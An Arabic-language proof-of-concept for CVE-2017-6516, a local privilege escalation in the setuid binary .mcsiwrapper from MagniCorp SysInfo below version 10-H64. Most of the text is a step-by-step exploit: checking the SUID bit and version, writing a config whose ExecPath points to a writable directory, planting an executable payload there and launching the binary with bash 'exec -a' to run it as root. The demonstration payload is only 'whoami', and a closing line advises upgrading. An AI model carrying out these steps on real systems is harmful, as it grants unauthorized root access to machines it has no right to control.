
PoC / منهجية لاستغلال CVE-2017-6516
CVE-2017-6516 هي ثغرة تصعيد صلاحيات تستهدف الثنائي .mcsiwrapper من MagniCorp SysInfo تحت الإصدار 10-H64. عندما يكون لهذا الثنائي بت SUID مضبوطًا ويكون قديمًا، يمكن للمستخدم تنفيذ كود عشوائي بصفت مالك الثنائي - والذي غالبًا ما يكون root.
.mcsiwrapper مثبتًا كـ setuid:$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper تحت الإصدار 10-H64:$ .mcsiwrapper --version
<إصدار أقل من 10-H64>
أنشئ ملفًا باسم config بالمحتوى التالي:
ExecPath=<مسار لدليل قابل للكتابة>
أنشئ ملفًا قابلًا للتنفيذ كحمولة في دليل ExecPath، على سبيل المثال:
#!/bin/sh
whoami
واجعله قابلًا للتنفيذ:
$ chmod +x payload
شغّل الأمر:
$ bash -c "exec -a payload .mcsiwrapper --configfile <مسار ملف الإعدادات>"
root
قم بتحديث .mcsiwrapper إلى على الأقل 10-H64.